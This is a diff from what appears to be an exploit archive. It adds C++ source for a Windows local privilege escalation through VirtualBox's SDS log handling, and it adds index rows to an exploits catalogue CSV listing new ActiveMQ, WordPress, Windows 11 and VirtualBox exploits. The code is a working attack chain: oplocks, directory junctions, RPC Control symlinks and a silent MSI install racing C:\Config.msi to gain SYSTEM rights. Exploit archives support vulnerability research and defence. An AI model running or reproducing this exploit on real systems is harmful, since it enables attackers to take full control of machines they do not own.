+ return 0;
+}
+DWORD WINAPI install(void*) {
+ HMODULE hm = GetModuleHandle(NULL);
+ HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_MSI1), L"msi");
+ wchar_t msipackage[MAX_PATH] = { 0x0 };
+ GetTempFileName(L"C:\\windows\\temp\\", L"MSI", 0, msipackage);
+ printf("[*] MSI file: %ls\n", msipackage);
+ DWORD MsiSize = SizeofResource(hm, res);
+ void* MsiBuff = LoadResource(hm, res);
+ HANDLE pkg = CreateFile(msipackage, GENERIC_WRITE | WRITE_DAC,
+FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,
+CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+ WriteFile(pkg, MsiBuff, MsiSize, NULL, NULL);
+ CloseHandle(pkg);
+ MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL);
+ UINT a = MsiInstallProduct(msipackage, L"ACTION=INSTALL");
+ printf("%d\n", a);
+ MsiInstallProduct(msipackage, L"REMOVE=ALL");
+ DeleteFile(msipackage);
+ return 0;
+}
+BOOL Move(HANDLE hFile) {
+ if (hFile == INVALID_HANDLE_VALUE) {
+  printf("[!] Invalid handle!\n");
+  return FALSE;
+ }
+ wchar_t tmpfile[MAX_PATH] = { 0x0 };
+ RPC_WSTR str_uuid;
+ UUID uuid = { 0 };
+ UuidCreate(&uuid);
+ UuidToString(&uuid, &str_uuid);
+ _swprintf(tmpfile, L"\\??\\C:\\windows\\temp\\%s", str_uuid);
+ size_t buffer_sz = sizeof(FILE_RENAME_INFO) + (wcslen(tmpfile) *
+sizeof(wchar_t));
+ FILE_RENAME_INFO* rename_info =
+(FILE_RENAME_INFO*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY |
+HEAP_GENERATE_EXCEPTIONS, buffer_sz);
+ IO_STATUS_BLOCK io = { 0 };
+ rename_info->ReplaceIfExists = TRUE;
+ rename_info->RootDirectory = NULL;
+ rename_info->Flags = 0x00000001 | 0x00000002 | 0x00000040;
+ rename_info->FileNameLength = wcslen(tmpfile) * sizeof(wchar_t);
+ memcpy(&rename_info->FileName[0], tmpfile, wcslen(tmpfile) *
+sizeof(wchar_t));
+ NTSTATUS status = pNtSetInformationFile(hFile, &io, rename_info,
+buffer_sz, 65);
+ if (status != 0) {
+  return FALSE;
+ }
+ return TRUE;
+}
+void callback() {
+ SetThreadPriority(GetCurrentThread(), REALTIME_PRIORITY_CLASS);
+ Move(hFile);
+ hthread = CreateThread(NULL, NULL, install, NULL, NULL, NULL);
+ HANDLE hd;
+ do {
+  hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
+FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
+ } while (!hd);
+ do {
+  CloseHandle(hd);
+  hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
+FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
+ } while (hd);
+ CloseHandle(hd);
+ do {
+  hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
+FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
+  CloseHandle(hd);
+ } while (retcode != 0xC0000022);
+}
+HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
+dispostion) {
+ UNICODE_STRING ufile;
+ HANDLE hDir;
+ pRtlInitUnicodeString(&ufile, file);
+ OBJECT_ATTRIBUTES oa = { 0 };
+ IO_STATUS_BLOCK io = { 0 };
+ InitializeObjectAttributes(&oa, &ufile, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ retcode = pNtCreateFile(&hDir, access, &oa, &io, NULL,
+FILE_ATTRIBUTE_NORMAL, share, dispostion, FILE_DIRECTORY_FILE |
+FILE_OPEN_REPARSE_POINT, NULL, NULL);
+ if (!NT_SUCCESS(retcode)) {
+  return NULL;
+ }
+ return hDir;
+}
+LPWSTR BuildPath(LPCWSTR path) {
+ wchar_t ntpath[MAX_PATH];
+ swprintf(ntpath, L"\\??\\%s", path);
+ return ntpath;
+}
+void loadapis() {
+ HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
+ if (ntdll != NULL) {
+  pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll,
+"RtlInitUnicodeString");
+  pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
+  pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll,
+"NtSetInformationFile");
+ }
+ if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL) {
+  printf("Cannot load api's %d\n", GetLastError());
+  exit(0);
+ }
+}
+void cb0() {
+ if (!Move(h)) {
+  printf("reached3\n");
+  exit(1);
+ }
+ printf("reached2\n");
+ _swprintf(dir, L"C:\\ProgramData\\VirtualBox");
+ if (!CreateJunction(BuildPath(dir), L"\\RPC Control")) {
+  printf("[!] Exiting!\n");
+  exit(1);
+ }
+ WCHAR asdfasdf[MAX_PATH];
+ _swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
+ if (!DosDeviceSymLink(asdfasdf,
+L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION")) {
+  printf("zxc\n");
+  //printf("[!] Exiting!\n");
+  //exit(1);
+ }
+}
+void cb1() {
+ printf("[!] oplock triggered\n");
+ if (!Move(vb11)) {
+  printf("reached3\n");
+  exit(1);
+ }
+ if (!CreateDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log", NULL)) {
+  printf("Error creating dir. Exiting\n");
+  exit(1);
+ }
+ return;
+}
+BOOL Monitor(HANDLE hDir) {
+ printf("[!] Monitor called\n");
+ BOOL deleted = FALSE;
+ _swprintf(filen, L"VBoxSDS.log.11");
+ do {
+  do {
+   h = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
+FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
+FILE_FLAG_OVERLAPPED, NULL);
+   printf("h: %x\n", h);
+  } while (h == INVALID_HANDLE_VALUE);
+  oplock = FileOpLock::CreateLock(h, cb0);
+  if (oplock != NULL) {
+   HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS,
+(LPVOID)1, 0, NULL);
+   oplock->WaitForLock(INFINITE);
+   CloseHandle(c);
+  }
+  deleted = TRUE;
+ } while (deleted == FALSE);
+ return deleted;
+}

files_exploits.csv

@@ -10684,6 +10684,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2237,exploits/multiple/remote/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow",2006-08-21,"Jacobo Avariento",remote,multiple,,2006-08-20,2016-10-27,1,OSVDB-27588;CVE-2006-3747,,,,http://www.exploit-db.comapache_2.0.58-win32-x86-no_ssl.msi,
 33868,exploits/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",remote,multiple,,2010-04-22,2014-06-25,1,CVE-2010-1587;OSVDB-64020,,,,,https://www.securityfocus.com/bid/39636/info
 33905,exploits/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",remote,multiple,,2010-04-28,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39771/info
+52288,exploits/multiple/remote/52288.py,"Apache ActiveMQ 6.1.6 - Denial of Service (DOS)",2025-05-09,"Abdualhadi khalifa",remote,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27533,,,,,
 50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",2022-03-16,Ven3xy,remote,multiple,,2022-03-16,2022-03-16,0,CVE-2022-24112,,,,,
 29930,exploits/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,remote,multiple,,2007-04-27,2013-11-30,1,CVE-2007-2353;OSVDB-34154,,,,,https://www.securityfocus.com/bid/23687/info
 46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,,2019-04-09,2019-04-09,0,CVE-2019-0227,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/d5d317bb211af59d0708fd602d83bd80b61ae37b/CVE-2019-0227/CVE-2019-0227.py
@@ -12403,6 +12404,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,,
 51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,,
 51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,,
+52286,exploits/multiple/webapps/52286.txt,"SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation",2025-05-09,"Abdualhadi khalifa",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27007,,,,,https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/
 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,,
 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info
 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,,
@@ -12491,6 +12493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
+52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,
@@ -41282,6 +41285,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
 52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,,
 52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,,
+52284,exploits/windows/local/52284.C++,"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-38193,,,,,
 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,
@@ -42178,6 +42182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10204,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1257
 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10129,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1296
 46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,,2019-04-24,2019-04-24,1,CVE-2019-2721,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1811
+52287,exploits/windows/local/52287.C++,"VirtualBox 7.0.16 - Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-21111,,,,,
 24910,exploits/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Local Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",local,windows,,2013-04-02,2013-04-07,1,OSVDB-92085,,,,http://www.exploit-db.cominstall_virtualdj_home_v7.3.exe,
 10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,,2010-01-01,2017-11-16,1,,,,,http://www.exploit-db.comvirtualdj_trial_v6.0.6_newyearedition.exe,
 16070,exploits/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,local,windows,,2011-01-28,2011-01-28,1,OSVDB-70695,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-28-at-122113-pm.png,http://www.exploit-db.comVirtuosaTrial.exe,